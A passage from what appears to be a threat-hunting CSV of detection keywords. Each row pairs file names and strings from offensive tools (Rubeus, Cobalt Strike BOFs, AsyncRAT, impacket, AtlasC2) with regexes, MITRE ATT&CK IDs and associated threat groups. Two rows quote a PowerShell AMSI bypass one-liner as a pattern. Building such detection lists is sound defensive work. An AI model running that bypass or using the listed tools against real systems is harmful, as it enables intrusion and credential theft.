Access","https://github.com/YOLOP0wn/POSTDump","1","1","#content","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","34124" "*ASRenum-BOF.*",".{0,1000}ASRenum\-BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","N/A","10","10","153","17","2024-03-01T14:03:44Z","2022-12-28T14:41:02Z","34125" "*asrep_attack*",".{0,1000}asrep_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script 
that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","34126" "*asrep2kirbi*",".{0,1000}asrep2kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","34127" "*asreprc4_attack*",".{0,1000}asreprc4_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","34128" "*asreproast /*",".{0,1000}asreproast\s\/.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation 
tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","34129" "*asreproast(*",".{0,1000}asreproast\(.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","34130" "*Asreproast.*",".{0,1000}Asreproast\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","34131" "*ASREPRoast.ps1*",".{0,1000}ASREPRoast\.ps1.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. 
","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","N/A","3","202","58","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z","34132" "*asreproast_*.txt*",".{0,1000}asreproast_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","34133" "*asreproast_john_results_*",".{0,1000}asreproast_john_results_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","34134" "*asreproast_output_*.txt*",".{0,1000}asreproast_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","34135" "*ASREProastables.txt*",".{0,1000}ASREProastables\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","34136" 
"*ASreproasting.txt*",".{0,1000}ASreproasting\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","34137" "*asreproasting.x64*",".{0,1000}asreproasting\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - 
COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","34138" "*ASRepToHashcat*",".{0,1000}ASRepToHashcat.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","34139" "*Assemblies/SharpMove.exe*",".{0,1000}Assemblies\/SharpMove\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","N/A","10","7","666","109","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z","34141" "*assembly AMSITrigger *",".{0,1000}assembly\sAMSITrigger\s.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. 
On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","34142" "*Assembly.GetType(""System.Management.Automation.AmsiUtils"").getField(""amsiInitFailed""*'NonPublic*Static').SetValue($null*$true)*",".{0,1000}Assembly\.GetType\(\""System\.Management\.Automation\.AmsiUtils\""\)\.getField\(\""amsiInitFailed\"".{0,1000}\'NonPublic.{0,1000}Static\'\)\.SetValue\(\$null.{0,1000}\$true\).{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","34143" "*Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'*'NonPublic*Static').SetValue($null*$true)*",".{0,1000}Assembly\.GetType\(\'System\.Management\.Automation\.AmsiUtils\'\)\.GetField\(\'amsiInitFailed\'.{0,1000}\'NonPublic.{0,1000}Static\'\)\.SetValue\(\$null.{0,1000}\$true\).{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","PowerShell AMSI Bypass","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","34144" 
"*ASSEMBLY_PUBLIC_KEY*136e5fbf23bb401e*",".{0,1000}ASSEMBLY_PUBLIC_KEY.{0,1000}136e5fbf23bb401e.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","#content","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","34145" "*--assemblyargs AntiVirus AppLocker*",".{0,1000}\-\-assemblyargs\sAntiVirus\sAppLocker.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","34146" "*Assets/solution/dllmain.cpp*",".{0,1000}Assets\/solution\/dllmain\.cpp.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","34147" "*AssmblyLoader*",".{0,1000}AssmblyLoader.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","34150" "*AsStrongAsFuck.exe*",".{0,1000}AsStrongAsFuck\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","34159" "*AsStrongAsFuck.py*",".{0,1000}AsStrongAsFuck\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","34160" "*Async RDP Client. Duckyscript will be executed by pressing ESC 3 times*",".{0,1000}Async\sRDP\sClient\.\sDuckyscript\swill\sbe\sexecuted\sby\spressing\sESC\s3\stimes.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","34163" "*async_webshell-all.py*",".{0,1000}async_webshell\-all\.py.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","34164" "*AsyncRAT Simple RAT*",".{0,1000}AsyncRAT\s\sSimple\sRAT.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","N/A","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","34165" "*AsyncRAT Server*",".{0,1000}AsyncRAT\sServer.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","#certificate","default cert name","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","34166" "*AsyncRAT.exe*",".{0,1000}AsyncRAT\.exe.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","1","N/A","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","34167" "*AsyncRAT/DCRat*",".{0,1000}AsyncRAT\/DCRat.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 
T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","34168" "*asyncssh_commander.py *",".{0,1000}asyncssh_commander\.py\s.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","34169" "*asyncssh_commander.py*",".{0,1000}asyncssh_commander\.py.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","34170" "*atexec.py*",".{0,1000}atexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","34176" "*Athena.Forwarders.SMB*",".{0,1000}Athena\.Forwarders\.SMB.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","34177" "*athena/agent_code/*",".{0,1000}athena\/agent_code\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","34178" "*AthenaPlugins.csproj*",".{0,1000}AthenaPlugins\.csproj.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","34179" "*AtlasC2*APIModels*",".{0,1000}AtlasC2.{0,1000}APIModels.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","N/A","10","10","211","41","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z","34193" "*AtlasC2*Client*",".{0,1000}AtlasC2.{0,1000}Client.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","N/A","10","10","211","41","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z","34194" "*AtlasC2*implant*",".{0,1000}AtlasC2.{0,1000}implant.{0,1000}","offensive_tool_keyword","AtlasC2","C# 
C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","N/A","10","10","211","41","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z","34195" "*AtlasC2*TeamServer*",".{0,1000}AtlasC2.{0,1000}TeamServer.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","N/A","10","10","211","41","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z","34196" "*AtlasC2.exe*",".{0,1000}AtlasC2\.exe.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","N/A","10","10","211","41","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z","34197" "*AtlasC2b.exe*",".{0,1000}AtlasC2b\.exe.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","N/A","10","10","211","41","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z","34198" "*AtlasC2b.sln*",".{0,1000}AtlasC2b\.sln.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - 
T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","N/A","10","10","211","41","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z","34199" "*AtlasImplant.yar*",".{0,1000}AtlasImplant\.yar.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","N/A","10","10","211","41","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z","34200" "*AtlasReaper.exe*",".{0,1000}AtlasReaper\.exe.{0,1000}","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","N/A","3","3","255","28","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z","34201" "*AtlasReaper-main*",".{0,1000}AtlasReaper\-main.{0,1000}","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","N/A","3","3","255","28","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z","34202" "*atmail2john.pl*",".{0,1000}atmail2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","34203" "*atomizer imap 
